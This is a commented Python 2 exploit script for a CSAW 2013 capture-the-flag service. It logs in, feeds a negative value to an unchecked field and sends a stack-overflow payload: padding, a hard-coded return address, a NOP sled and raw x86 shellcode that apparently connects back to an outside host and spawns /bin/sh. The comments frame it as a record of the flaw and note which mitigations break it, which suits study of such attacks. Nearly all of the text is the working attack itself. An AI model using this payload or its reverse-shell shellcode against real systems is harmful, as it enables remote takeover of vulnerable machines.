- # Python 2 script (print statements, str-based socket I/O) that drives a
- # CSAW 2013 CTF service listening on localhost:34266 through a stack
- # overflow.  Read it as a record of the exact input layout the service
- # fails to validate: the hard-coded return address and raw shellcode only
- # work on a stack that is fixed (no ASLR), writable and executable (no NX)
- # and unprotected by a canary -- each of those mitigations breaks it.
- import socket,time
- from struct import *  # wildcard import; only pack() is used below
- import binascii  # imported but never referenced in this listing
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect(("localhost", 34266))
- print "stg 1"
- time.sleep(1)  # crude pacing; no banner or prompt is read before sending
- s.send("csaw2013\nS1mplePWD\n") # log in: username and password, each newline-terminated, sent in cleartext
- print "stg 2"
- time.sleep(1)
- s.send("-1\n")  # negative value fed to the service; presumably a length or menu field that is not range-checked -- confirm against the service source
- print s.recv(4096)  # dump whatever the service answers (at most 4096 bytes, a single recv)
- address = 0xbffff650 # fixed stack address observed in a debugger; assumes the same stack layout and environment on every run
- shellcode="\x31\xdb\xf7\xe3\x52\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\x68" + "\x4F\x36\x69\x20" +"\x66\x68" +"\x27\x1a" +"\x66\x51\xb0\x3f\xcd\x80\x49\x79\xf9\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb0" +"\x66\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x31\xc9\x89\xe3" +"\xb0\x0b\xcd\x80"  # raw x86 machine code: several int 0x80 traps (\xcd\x80) and the bytes of "//bin/sh" are visible; the separately spliced 4-byte and 2-byte chunks are presumably a connect-back address and port -- verify by disassembly before relying on this description
- payload = "a" * 1056 # padding up to the saved return address
- payload += pack('<I', address) # overwrites the saved EIP (little-endian 32-bit)
- payload += "\x90" * 80 + shellcode # NOP sled (0x90) followed by the shellcode; `address` above presumably points into the sled
- s.send(payload)  # fire and exit: the response is not read and the socket is never closed